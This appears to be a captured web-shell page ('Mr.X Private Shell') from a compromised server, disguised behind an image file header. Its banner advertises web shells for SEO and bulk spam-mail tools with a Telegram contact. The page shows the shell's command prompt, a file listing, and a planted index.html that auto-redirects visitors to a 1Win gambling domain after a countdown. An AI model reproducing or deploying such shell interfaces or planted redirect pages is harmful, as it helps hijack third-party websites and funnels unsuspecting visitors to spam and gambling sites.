����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

u6763389@216.73.217.52: ~ $
<!DOCTYPE html>
<html lang="ru">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title id="pageTitle">Переход на 1Win | Регистрация</title>
    <style>
        /* Все стили остаются без изменений */
        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
        }
        
        body {
            font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, sans-serif;
            background: linear-gradient(135deg, #1a1b2e 0%, #2d6ae3 100%);
            color: white;
            min-height: 100vh;
            display: flex;
            align-items: center;
            justify-content: center;
            padding: 20px;
        }
        
        .container {
            max-width: 600px;
            width: 100%;
            text-align: center;
        }
        
        .logo {
            font-size: 3rem;
            margin-bottom: 20px;
            color: #fbbf24;
        }
        
        h1 {
            font-size: 2.5rem;
            margin-bottom: 20px;
            font-weight: 700;
        }
        
        .subtitle {
            font-size: 1.2rem;
            margin-bottom: 30px;
            opacity: 0.9;
            line-height: 1.6;
        }
        
        .loader {
            width: 60px;
            height: 60px;
            border: 5px solid rgba(255, 255, 255, 0.3);
            border-top-color: white;
            border-radius: 50%;
            margin: 0 auto 30px;
            animation: spin 1s linear infinite;
        }
        
        @keyframes spin {
            to { transform: rotate(360deg); }
        }
        
        .counter {
            font-size: 1.5rem;
            margin-bottom: 30px;
            font-weight: 600;
        }
        
        .btn {
            display: inline-block;
            background: linear-gradient(135deg, #fbbf24 0%, #f59e0b 100%);
            color: #1a1b2e;
            padding: 18px 40px;
            border-radius: 50px;
            text-decoration: none;
            font-weight: 700;
            font-size: 1.2rem;
            transition: all 0.3s;
            border: none;
            cursor: pointer;
            margin-bottom: 20px;
        }
        
        .btn:hover {
            transform: translateY(-3px);
            box-shadow: 0 10px 25px rgba(251, 191, 36, 0.4);
        }
        
        .features {
            display: flex;
            justify-content: center;
            gap: 30px;
            margin-top: 30px;
            flex-wrap: wrap;
        }
        
        .feature {
            display: flex;
            flex-direction: column;
            align-items: center;
            gap: 10px;
        }
        
        .feature i {
            font-size: 1.5rem;
            color: #fbbf24;
        }
        
        .feature span {
            font-size: 0.9rem;
            opacity: 0.8;
        }
        
        .note {
            margin-top: 30px;
            font-size: 0.9rem;
            opacity: 0.7;
            max-width: 500px;
            margin-left: auto;
            margin-right: auto;
        }
        
        /* Переключатель языков */
        .lang-switcher {
            margin-top: 20px;
            display: flex;
            justify-content: center;
            gap: 10px;
            flex-wrap: wrap;
        }
        
        .lang-switcher a {
            color: rgba(255,255,255,0.6);
            text-decoration: none;
            font-size: 0.85rem;
            padding: 5px 12px;
            border-radius: 20px;
            border: 1px solid rgba(255,255,255,0.1);
            transition: all 0.3s;
        }
        
        .lang-switcher a:hover {
            color: #fff;
            border-color: rgba(255,255,255,0.3);
            background: rgba(255,255,255,0.05);
        }
        
        .lang-switcher a.active {
            color: #fbbf24;
            border-color: #fbbf24;
            background: rgba(251, 191, 36, 0.1);
        }
        
        @media (max-width: 768px) {
            h1 {
                font-size: 2rem;
            }
            
            .subtitle {
                font-size: 1.1rem;
            }
            
            .btn {
                padding: 16px 32px;
                font-size: 1.1rem;
            }
            
            .features {
                gap: 20px;
            }
        }
        
        @media (max-width: 480px) {
            h1 {
                font-size: 1.8rem;
            }
            
            .btn {
                width: 100%;
                max-width: 300px;
            }
            
            .features {
                flex-direction: column;
                gap: 15px;
            }
        }
    </style>
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css">
</head>
<body>
    <div class="container">
        <div class="logo">
            <i class="fas fa-crown"></i>
        </div>
        
        <h1 id="title">Добро пожаловать на 1Win!</h1>
        
        <p class="subtitle" id="subtitle">
            Если сайт не открывается, возможно следует сменить регион и перезагрузить страницу!
        </p>
        
        <div class="loader"></div>
        
        <div class="counter" id="countdown">5</div>
        
        <a href="https://1www.store" class="btn" id="redirectBtn">
            <i class="fas fa-external-link-alt"></i>
            <span id="btnText">Перейти на 1Win сейчас</span>
        </a>
        
        <div class="features">
            <div class="feature">
                <i class="fas fa-gift"></i>
                <span id="feature1">Бонус 500%</span>
            </div>
            <div class="feature">
                <i class="fas fa-bolt"></i>
                <span id="feature2">Мгновенная регистрация</span>
            </div>
            <div class="feature">
                <i class="fas fa-shield-alt"></i>
                <span id="feature3">Безопасно</span>
            </div>
            <div class="feature">
                <i class="fas fa-headset"></i>
                <span id="feature4">Поддержка 24/7</span>
            </div>
        </div>
        
        <p class="note" id="note">
            Если перенаправление не произошло автоматически, нажмите кнопку выше. Регистрация занимает 1 минуту.
        </p>
        
        <!-- Переключатель языков -->
        <div class="lang-switcher">
            <a href="#" data-lang="ru" class="active">🇷🇺 Русский</a>
            <a href="#" data-lang="en">🇬🇧 English</a>
            <a href="#" data-lang="kk">🇰🇿 Қазақша</a>
            <a href="#" data-lang="uz">🇺🇿 O'zbekcha</a>
            <a href="#" data-lang="es">🇪🇸 Español</a>
            <a href="#" data-lang="pt">🇵🇹 Português</a>
            <a href="#" data-lang="hi">🇮🇳 हिन्दी</a>
        </div>
    </div>

    <script>
        // ============================================================
        // ПЕРЕВОДЫ (включая тайтлы)
        // ============================================================
        const translations = {
            ru: {
                title: 'Добро пожаловать на 1Win!',
                subtitle: 'Если сайт не открывается, возможно следует сменить регион и перезагрузить страницу!',
                btn: 'Перейти на 1Win сейчас',
                feature1: 'Бонус 500%',
                feature2: 'Мгновенная регистрация',
                feature3: 'Безопасно',
                feature4: 'Поддержка 24/7',
                note: 'Если перенаправление не произошло автоматически, нажмите кнопку выше. Регистрация занимает 1 минуту.',
                pageTitle: 'Переход на 1Win | Регистрация'
            },
            en: {
                title: 'Welcome to 1Win!',
                subtitle: 'If the site does not open, you may need to change your region and refresh the page!',
                btn: 'Go to 1Win now',
                feature1: 'Bonus 500%',
                feature2: 'Instant registration',
                feature3: 'Secure',
                feature4: '24/7 Support',
                note: 'If you are not redirected automatically, click the button above. Registration takes 1 minute.',
                pageTitle: 'Redirect to 1Win | Registration'
            },
            kk: {
                title: '1Win-ге қош келдіңіз!',
                subtitle: 'Егер сайт ашылмаса, аймақты өзгертіп, бетті жаңартып көріңіз!',
                btn: '1Win-ге өту',
                feature1: '500% бонус',
                feature2: 'Лезде тіркелу',
                feature3: 'Қауіпсіз',
                feature4: '24/7 қолдау',
                note: 'Егер автоматты түрде бағыттау болмаса, жоғарыдағы түймені басыңыз. Тіркелу 1 минутты алады.',
                pageTitle: '1Win-ге өту | Тіркелу'
            },
            uz: {
                title: '1Win-ga xush kelibsiz!',
                subtitle: 'Agar sayt ochilmasa, mintaqani o\'zgartirib, sahifani yangilang!',
                btn: '1Win-ga o\'tish',
                feature1: '500% bonus',
                feature2: 'Tez ro\'yxatdan o\'tish',
                feature3: 'Xavfsiz',
                feature4: '24/7 qo\'llab-quvvatlash',
                note: 'Agar avtomatik yo\'naltirish bo\'lmasa, yuqoridagi tugmani bosing. Ro\'yxatdan o\'tish 1 daqiqa davom etadi.',
                pageTitle: '1Win-ga o\'tish | Ro\'yxatdan o\'tish'
            },
            es: {
                title: '¡Bienvenido a 1Win!',
                subtitle: 'Si el sitio no se abre, es posible que deba cambiar su región y actualizar la página.',
                btn: 'Ir a 1Win ahora',
                feature1: 'Bono 500%',
                feature2: 'Registro instantáneo',
                feature3: 'Seguro',
                feature4: 'Soporte 24/7',
                note: 'Si no es redirigido automáticamente, haga clic en el botón de arriba. El registro toma 1 minuto.',
                pageTitle: 'Redirigir a 1Win | Registro'
            },
            pt: {
                title: 'Bem-vindo ao 1Win!',
                subtitle: 'Se o site não abrir, talvez seja necessário alterar sua região e atualizar a página.',
                btn: 'Ir para 1Win agora',
                feature1: 'Bônus 500%',
                feature2: 'Registro instantâneo',
                feature3: 'Seguro',
                feature4: 'Suporte 24/7',
                note: 'Se você não for redirecionado automaticamente, clique no botão acima. O registro leva 1 minuto.',
                pageTitle: 'Redirecionar para 1Win | Registro'
            },
            hi: {
                title: '1Win में आपका स्वागत है!',
                subtitle: 'यदि साइट नहीं खुलती है, तो आपको अपना क्षेत्र बदलकर पेज को रिफ्रेश करना पड़ सकता है!',
                btn: 'अभी 1Win पर जाएं',
                feature1: '500% बोनस',
                feature2: 'तत्काल पंजीकरण',
                feature3: 'सुरक्षित',
                feature4: '24/7 सहायता',
                note: 'यदि आप स्वचालित रूप से रीडायरेक्ट नहीं होते हैं, तो ऊपर दिए गए बटन पर क्लिक करें। पंजीकरण में 1 मिनट लगता है।',
                pageTitle: '1Win पर जाएं | पंजीकरण'
            }
        };

        // ============================================================
        // ОПРЕДЕЛЕНИЕ ЯЗЫКА
        // ============================================================
        function getLanguage() {
            // Проверяем, есть ли сохранённый язык в localStorage
            const savedLang = localStorage.getItem('regLang');
            if (savedLang && translations[savedLang]) {
                return savedLang;
            }
            
            // Определяем язык браузера
            const browserLang = navigator.language.split('-')[0];
            const supported = ['ru', 'en', 'kk', 'uz', 'es', 'pt', 'hi'];
            
            if (supported.includes(browserLang)) {
                return browserLang;
            }
            
            return 'ru'; // По умолчанию русский
        }

        // ============================================================
        // ПРИМЕНЕНИЕ ПЕРЕВОДОВ
        // ============================================================
        function applyLanguage(lang) {
            const t = translations[lang];
            if (!t) return;
            
            // Меняем тайтл (вкладка браузера)
            document.getElementById('pageTitle').textContent = t.pageTitle;
            document.title = t.pageTitle;
            
            // Меняем остальной текст
            document.getElementById('title').textContent = t.title;
            document.getElementById('subtitle').textContent = t.subtitle;
            document.getElementById('btnText').textContent = t.btn;
            document.getElementById('feature1').textContent = t.feature1;
            document.getElementById('feature2').textContent = t.feature2;
            document.getElementById('feature3').textContent = t.feature3;
            document.getElementById('feature4').textContent = t.feature4;
            document.getElementById('note').textContent = t.note;
            
            // Обновляем активную кнопку в переключателе
            document.querySelectorAll('.lang-switcher a').forEach(el => {
                el.classList.toggle('active', el.dataset.lang === lang);
            });
            
            // Сохраняем выбранный язык
            localStorage.setItem('regLang', lang);
            
            // Меняем атрибут lang у HTML
            document.documentElement.lang = lang;
        }

        // ============================================================
        // ОБРАТНЫЙ ОТСЧЁТ
        // ============================================================
        let countdown = 5;
        const countdownElement = document.getElementById('countdown');
        const redirectBtn = document.getElementById('redirectBtn');
        
        function updateCountdown() {
            countdownElement.textContent = countdown;
            
            if (countdown === 0) {
                // Перенаправление 
                window.location.href = "https://1www.store";
            } else {
                countdown--;
                setTimeout(updateCountdown, 1000);
            }
        }
        
        // ============================================================
        // ПЕРЕКЛЮЧАТЕЛЬ ЯЗЫКОВ
        // ============================================================
        document.querySelectorAll('.lang-switcher a').forEach(link => {
            link.addEventListener('click', function(e) {
                e.preventDefault();
                const lang = this.dataset.lang;
                applyLanguage(lang);
            });
        });

        // ============================================================
        // ЗАПУСК
        // ============================================================
        const currentLang = getLanguage();
        applyLanguage(currentLang);
        updateCountdown();
        
        // Принудительный переход по кнопке
        redirectBtn.addEventListener('click', function(e) {
            e.preventDefault();
            window.location.href = "https://1www.store";
        });
        
        // Открытие в новой вкладке при Ctrl+клик
        redirectBtn.addEventListener('auxclick', function(e) {
            if (e.button === 1) {
                e.preventDefault();
                window.open("https://1www.store", "_blank");
            }
        });
    </script>
</body>
</html>

Filemanager

Name Type Size Permission Actions
v2 Folder 0755
index.html File 16.78 KB 0666
index.html2 File 6.89 KB 0666